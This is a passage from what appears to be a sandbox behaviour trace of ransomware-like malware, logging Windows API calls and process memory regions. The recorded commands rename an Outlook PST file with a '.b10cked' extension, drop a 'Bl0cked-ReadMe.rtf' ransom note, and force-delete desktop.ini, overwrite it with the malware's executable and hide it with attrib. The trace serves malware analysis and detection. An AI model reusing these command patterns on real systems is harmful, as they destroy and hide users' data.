lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa70, dwThreadId=0x170)) returned 1 [0236.945] CloseHandle (hObject=0x1b4) returned 1 [0236.945] CloseHandle (hObject=0x120) returned 1 [0236.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\") returned 0x29 [0236.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0236.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0236.946] CharUpperBuffW (in: 
lpsz="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\") returned 0x29 [0236.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0236.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0236.946] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0236.946] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0236.946] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0236.946] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\") returned 0x23 [0236.946] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0236.946] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0236.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, 
dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbd8, dwThreadId=0xf7c)) returned 1 [0236.951] CloseHandle (hObject=0x1b4) returned 1 [0236.951] CloseHandle (hObject=0x120) returned 1 [0236.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\bl0cked-readme.rtf")) returned 0xffffffff [0236.952] GetLastError () returned 0x2 [0236.952] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0236.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\bl0cked-readme.rtf")) returned 0x20 [0236.955] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.956] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0236.956] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0236.956] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.956] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0236.956] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0236.956] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0236.956] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\") returned 0x23 [0236.957] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0236.957] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0236.957] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1") returned 0x22 [0236.957] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0236.957] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0236.957] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8e8, dwThreadId=0x458)) returned 1 [0237.101] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) Thread: id = 125 os_tid = 0xf84 Thread: id = 126 os_tid = 0xf88 Thread: id = 127 os_tid = 0xf8c Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 596 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 597 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 598 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 599 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 600 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" 
(normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 601 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 602 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 603 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 604 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 605 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 649 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 650 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 651 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 652 start_va = 0x2c0000 end_va = 0x326fff entry_point = 0x2c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 653 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 654 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 655 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 656 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 657 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 658 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 659 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 660 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 661 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 662 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 663 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 664 start_va = 0x76490000 end_va = 0x764aefff entry_point 
= 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 665 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 666 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 667 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 668 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 669 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 670 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 671 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 672 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 721 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 722 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 723 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file 
name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 724 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 725 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 11 os_tid = 0xb00 [0094.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fefc | out: lpSystemTimeAsFileTime=0x18fefc*(dwLowDateTime=0x76f7f7c0, dwHighDateTime=0x1d440a9)) [0094.060] GetCurrentProcessId () returned 0xafc [0094.060] GetCurrentThreadId () returned 0xb00 [0094.060] GetTickCount () returned 0x22ce9 [0094.060] QueryPerformanceCounter (in: lpPerformanceCount=0x18fef4 | out: lpPerformanceCount=0x18fef4*=15084951131) returned 1 [0094.061] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0094.061] __set_app_type (_Type=0x1) [0094.061] __p__fmode () returned 0x76b331f4 [0094.061] __p__commode () returned 0x76b331fc [0094.061] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0094.061] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0094.061] GetCurrentThreadId () returned 0xb00 [0094.062] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb00) returned 0x38 [0094.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.062] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0094.062] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.062] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.062] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe8c | out: phkResult=0x18fe8c*=0x0) returned 0x2 [0094.062] VirtualQuery (in: lpAddress=0x18fec3, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.062] GetConsoleOutputCP () returned 0x1b5 [0094.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.062] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0094.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.062] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.063] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0094.063] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0094.063] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.063] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.063] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0094.063] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.063] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.063] GetEnvironmentStringsW () returned 0x1d00f8* [0094.063] FreeEnvironmentStringsW (penv=0x1d00f8) returned 1 [0094.064] GetEnvironmentStringsW () returned 0x1d00f8* [0094.064] FreeEnvironmentStringsW (penv=0x1d00f8) returned 1 [0094.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18edfc | out: phkResult=0x18edfc*=0x40) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0xf0, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x0, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x40, 
lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x40, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x40, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegCloseKey (hKey=0x40) returned 0x0 [0094.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18edfc | out: phkResult=0x18edfc*=0x40) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x40, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x0, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x9, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: 
